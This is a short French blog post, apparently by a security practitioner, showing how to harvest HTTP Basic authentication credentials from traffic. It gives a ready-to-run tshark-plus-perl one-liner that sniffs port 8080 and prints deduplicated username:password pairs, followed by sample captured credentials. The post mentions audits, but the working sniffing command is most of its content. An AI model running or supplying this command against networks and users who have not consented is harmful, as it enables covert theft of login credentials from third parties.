Moissonner de l’authentification basique en 1 ligne…

En audit ou autre… l’authentification HTTP basique est juste un header contenant base64(user:password) Il est ainsi très facile de moissonner les identifiants si on est sur le chemin. On retrouve cette chose avant un proxy ou un honteux site web avec authentification basique.

Voici une ligne wireshark qui mouline tout ce qui passe sur le port 8080 et le petit perl d’après évite les doublons.

tshark -ieth2 port 8080 -R "http.request.method" -Tfields -e http.authbasic \
| perl -ne 'unless (exists($I{$_})) { print ; $I{$_}=1;}'

L’output attendue est sympa :

Running as user "root" and group "root". This could be dangerous.
Capturing on eth2
thanatos:helloword
quidam1:taud16er
quidam2:funky123@
...